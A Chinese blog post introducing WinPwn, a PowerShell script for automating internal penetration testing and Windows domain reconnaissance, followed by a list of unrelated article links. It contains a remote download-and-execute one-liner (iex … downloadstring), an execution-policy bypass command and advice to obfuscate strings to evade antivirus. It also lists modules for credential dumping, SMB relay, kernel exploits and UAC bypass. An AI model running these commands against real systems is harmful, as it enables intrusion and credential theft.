域信息收集自动脚本WinPwn
时间:2022-07-22
本文章向大家介绍域信息收集自动脚本WinPwn,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
WinPwn
自动化尽可能多的内部渗透测试流程(侦察和开发)具有自动代理识别和集成功能的脚本。
本地调用
powershell.exe -exec bypass -command "& {import-module C:Users17782DesktopWinPwn-masterWinPwn-masteroffline_WinPwn.ps1;localreconmodules}"
远程下载调用
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
绕杀软需要自己混淆或者手动对触发器字符串进行编码。
具体功能有:
-
Inveigh
->在新的控制台窗口中执行Inveigh,集成了会话管理(Invoke-TheHash)的SMB-Relay攻击
-
sessionGopher
->执行Sessiongopher询问您参数
-
kittielocal
->- 模糊的调用-Mimikatz版本
- 内存中的Safetykatz
- 使用rundll32技术转储lsass
- 下载并运行混淆的Lazagne
- 转储浏览器凭证
- 定制的Mimikittenz版本
- 窃取Wifi凭证
- 转储SAM文件NTLM哈希
-
localreconmodules
->- 收集已安装的软件,易受攻击的软件,共享,网络信息,组,特权等等
- 检查典型的漏洞,如SMB签名,LLMNR中毒,MITM6,通过HTTP的WSUS
- 检查Powershell事件日志中的凭证或其他敏感信息
- 收集浏览器凭证和历史记录
- 在注册表和文件系统中搜索密码
- 查找敏感文件(配置文件,RDP文件,Keepass数据库)
- 在本地系统上搜索.NET Binaries
- 可选:Get-Computerdetails(Powersploit)和PSRecon
-
domainreconmodules
->- 收集各种域信息以进行手动检查
- 在说明字段中找到广告密码
- 搜索潜在的敏感域共享文件
- 枚举不受约束的委派系统/用户
- 生成猎犬报告
- 用于域系统的MS17-10扫描仪
- 适用于域系统的Bluekeep扫描仪
- SQL Server发现和审核功能-PowerUpSQL
- MS-RPRN检查域控制器或所有系统
- Grouper2的组策略审核
- 使用ADRecon在CSV文件(如果已安装Excel,则为XLS)中生成AD报告。
- 检查打印机的常见问题
- 搜索基于资源的约束委派攻击路径
-
Privescmodules
- itm4ns调用-PrivescCheck
- winPEAS
- Powersploits PowerUp Allchecks,Sherlock,GPPPasswords
- DLL劫持,文件权限,注册表权限和弱键,烂/多汁土豆检查
-
kernelexploits
->- MS15-077-(XP / Vista / Win7 / Win8 / 2000/2003/2008/2012)仅x86!
- MS16-032-(2008/7/8/10/2012)!
- MS16-135-(仅WS2k16)!
- CVE-2018-8120-2018年5月,Windows 7 SP1 / 2008 SP2,2008 R2 SP1!
- CVE-2019-0841-2019年4月!
- CVE-2019-1069-Polarbear硬链接,需要凭据-2019年6月!
- CVE-2019-1129 / 1130-竞争状况,需要多个核心-2019年7月!
- CVE-2019-1215-2019年9月-仅x64!
- CVE-2020-0638-2020年2月-仅x64!
- CVE-2020-0796-SMBGhost
-
UACBypass
->- UAC Magic,基于James Forshaw在UAC上的三篇文章
- UAC绕过cmstp技术,作者:Oddvar Moe
- DiskCleanup UAC旁路,James Forshaw提供
- DccwBypassUAC技术,作者Ernesto Fernandez和Thomas Vanhoutte
-
SYSTEMShell
->- 使用CreateProcess弹出系统shell
- 使用NamedPipe模拟模仿Pop System Shell
- 使用令牌操作的Pop System Shell
- 使用UsoClient DLL加载或CreateProcess绑定系统shell
更多功能,大家可以自行到github上看文档,这个工具不错的。
https://github.com/S3cur3Th1sSh1t/WinPwn#sessiongopher---executes-sessiongopher-asking-you-for-parameters
- log4j:ERROR Failed to load driver
- 前端MVC Vue2学习总结(七)——ES6与Module模块化、Vue-cli脚手架搭建、开发、发布项目与综合示例
- 前端MVC Vue2学习总结(六)——axios与跨域HTTP请求、Lodash工具库
- spring之config.xml完整版示例
- 前端MVC Vue2学习总结(五)——表单输入绑定、组件
- 【HCTF】2017部分Web出题思路详解
- 前端MVC Vue2学习总结(四)——条件渲染、列表渲染、事件处理器
- 如何移除Android应用广告
- 前端MVC Vue2学习总结(三)——模板语法、过滤器、计算属性、观察者、Class 与 Style 绑定
- 前端MVC Vue2学习总结(二)——Vue的实例、生命周期与Vue脚手架(vue-cli)
- hive具体操作
- hive中配置hwi
- 从零开始内网安全渗透学习
- hive启动后相关操作
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Spring 中基于 AOP 的 XML操作方式
- python基础 -- 内建函数
- virtualenv 安装及使用
- Git 分布式版本控制 -- (1、基本使用)
- python爬虫----(scrapy框架提高(1),自定义Request爬取)
- python基础 -- 异常处理try的使用及一些思考
- 记一次关于MySQL与PHP的蠢事
- 编写一个简单的JQuery插件
- Spring AOP异常:Error creating bean with name ‘org.springframework.aop.aspectj.
- Tomcat7 Redis Session 共享
- CodeIgniter (CI) 框架学习 -- load_class
- Laravel框架学习 -- php artisan down/up
- Spring中基于注解@AspectJ的AOP实现
- python提高--running-python-code-contained-in-a-strin
- linux shell 监控脚本 及 邮件发送